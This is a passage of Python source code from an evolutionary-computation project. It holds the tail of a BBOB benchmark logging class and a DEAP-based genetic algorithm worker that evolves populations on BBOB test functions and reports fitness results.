while self.lasteval_num >= np.floor(10 ** (self.idxEvalsTrigger / self.nbptsevals)):
self.idxEvalsTrigger += 1
while self.lasteval_num >= self.dim * 10 ** self.idxDIMEvalsTrigger:
self.idxDIMEvalsTrigger += 1
self.evalsTrigger = min(np.floor(10 ** (self.idxEvalsTrigger / self.nbptsevals)),
self.dim * 10 ** self.idxDIMEvalsTrigger)
if self.lasteval_num < self.nbFirstEvalsToAlwaysWrite:
self.evalsTrigger = self.lasteval_num + 1
# Also if we have a better solution
if fmin - fopt < self.fTrigger: # minimization only
if not hbuffr:
random_sol = [10. * random.random() - 5 for _ in range(self.dim)]
function = bn.dictbbob[self.function](self.instance)
fval = function(random_sol)
fopt = function.getfopt()
hbuffr.append(self.sprintData(1, algorithm, gen, ngen, fval, fopt, fopt - fval, random_sol))
#hbuffr.append(self.sprintData(1, algorithm, gen, ngen, fmin, fopt, error, sol))
hbuffr.append(self.sprintData(self.lasteval_num, algorithm, gen, ngen, fmin, fopt, error, sol))
if fmin <= fopt:
self.fTrigger = -np.inf
else:
if np.isinf(self.idxFTrigger):
self.idxFTrigger = np.ceil(np.log10(fmin - fopt)) * self.nbptsf
while fmin - fopt <= 10 ** (self.idxFTrigger / self.nbptsf):
self.idxFTrigger -= 1
self.fTrigger = min(self.fTrigger, 10 ** (self.idxFTrigger / self.nbptsf)) # TODO: why?
def sprintData(self, lasteval_num, algorithm, gen, ngen, fmin, fopt, error, sol):
"""Format data for printing."""
res = ('%d %+10.9e %+10.9e %+10.9e %+10.9e'
% (lasteval_num, fmin - fopt,
fmin - fopt, fmin,
fopt))
if len(sol) < 22:
tmp = []
for i in sol:
tmp.append(' %+5.4e' % i)
res += ''.join(tmp)
res += '\n'
return res
```
#### File: swarm-ga-worker/worker/ga_worker.py
```python
import random
from bbobbenchmarks import *
import uuid
from deap import base
from deap import creator
from deap import tools
class GA_Worker:
def __init__(self, conf):
self.conf = conf
self.function = dictbbob[self.conf['problem']['function']](int(self.conf['problem']['instance']))
self.F_opt = self.function.getfopt()
self.function_evaluations = 0 #Is not needed in EvoWorkers, they dont know the number of FE
self.deltaftarget = 1e-8
self.toolbox = base.Toolbox()
self.FC = 0
self.worker_uuid = uuid.uuid1()
self.space = None
self.evospace_sample = {'sample':conf['population']}
def setup(self):
if "FitnessMin" not in dir(creator):
creator.create("FitnessMin", base.Fitness, weights=(-1.0,)) #Minimizing Negative
if "Individual" not in dir(creator):
creator.create("Individual", list, typecode='d', fitness=creator.FitnessMin)
self.toolbox = base.Toolbox()
self.toolbox.register("attr_float", random.uniform, -5, 5)
self.toolbox.register("individual", tools.initRepeat, creator.Individual, self.toolbox.attr_float, self.conf['problem']['dim'])
self.toolbox.register("population", tools.initRepeat, list, self.toolbox.individual)
self.toolbox.register("evaluate", self.eval)
self.toolbox.register("mate", tools.cxTwoPoint)
self.toolbox.register("mutate", tools.mutGaussian, mu=self.conf['params']['GA']['mutation']['mu'], sigma=self.conf['params']['GA']['mutation']['sigma'], indpb=self.conf['params']['GA']['mutation']['indpb'])
self.toolbox.register("select", tools.selTournament, tournsize=self.conf['params']['GA']['selection']['tournsize'])
def eval(self, individual):
return self.function(individual),
def get(self):
pop = []
for cs in self.evospace_sample['sample']:
ind = creator.Individual(cs['chromosome'])
if 'score' in cs['fitness']:
ind.fitness = creator.FitnessMin(values=(cs['fitness']['score'],))
pop.append(ind)
return pop
def run(self):
evals = []
num_fe_first_sample = 0
first_sample = True
#random.seed(i)
CXPB = self.conf['params']['GA']['crossover']['CXPB']
MUTPB = self.conf['params']['GA']['mutation']['MUTPB']
NGEN = self.conf['params']['GA']['iterations']
pop = self.get()
# Evaluate the entire population
invalid_ind = [ind for ind in pop if not ind.fitness.valid]
num_fe_first_sample += len(invalid_ind)
fitnesses = list(map(self.toolbox.evaluate, pop))
for ind, fit in zip(pop, fitnesses):
ind.fitness.values = fit
# Begin the evolution
for g in range(NGEN):
num_fe = 0
#print("-- Generation %i --" % g)
# Select the next generation individuals
offspring = self.toolbox.select(pop, len(pop))
# Clone the selected individuals
offspring = list(map(self.toolbox.clone, offspring))
# Apply crossover and mutation on the offspring
for child1, child2 in zip(offspring[::2], offspring[1::2]):
# cross two individuals with probability CXPB
if random.random() < CXPB:
self.toolbox.mate(child1, child2)
# fitness values of the children
# must be recalculated later
del child1.fitness.values
del child2.fitness.values
for mutant in offspring:
# mutate an individual with probability MUTPB
if random.random() < MUTPB:
self.toolbox.mutate(mutant)
del mutant.fitness.values
# Evaluate the individuals with an invalid fitness
invalid_ind = [ind for ind in offspring if not ind.fitness.valid]
fitnesses = map(self.toolbox.evaluate, invalid_ind)
for ind, fit in zip(invalid_ind, fitnesses):
ind.fitness.values = fit
#print(" Evaluated %i individuals" % len(invalid_ind))
num_fe = num_fe + len(invalid_ind)
# The population is entirely replaced by the offspring
pop[:] = offspring
#print(pop)
# Gather all the fitnesses in one list and print the stats
fits = [ind.fitness.values[0] for ind in pop]
evals.append({"gen_num":g,"best_fitness":min(fits),"best_solution":tools.selBest(pop, 1)[0], "num_of_evals":num_fe })
best_ind = tools.selBest(pop, 1)[0]
final_pop = [{"chromosome": ind[:], "id": None,
"fitness": {"DefaultContext": ind.fitness.values[0], "score": ind.fitness.values[0]}}
for ind in pop]
self.conf.update({'iterations': evals, 'population': final_pop, 'best_individual': best_ind ,
'fopt': self.function.getfopt(), 'best_score':best_ind.fitness.values[0]})
if (best_ind.fitness.values[0] <= self.function.getfopt() + 1e-8):
self.conf['best'] = True
else:
self.conf['best'] = False
#print("Worker", self.conf)
return self.conf
``` |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.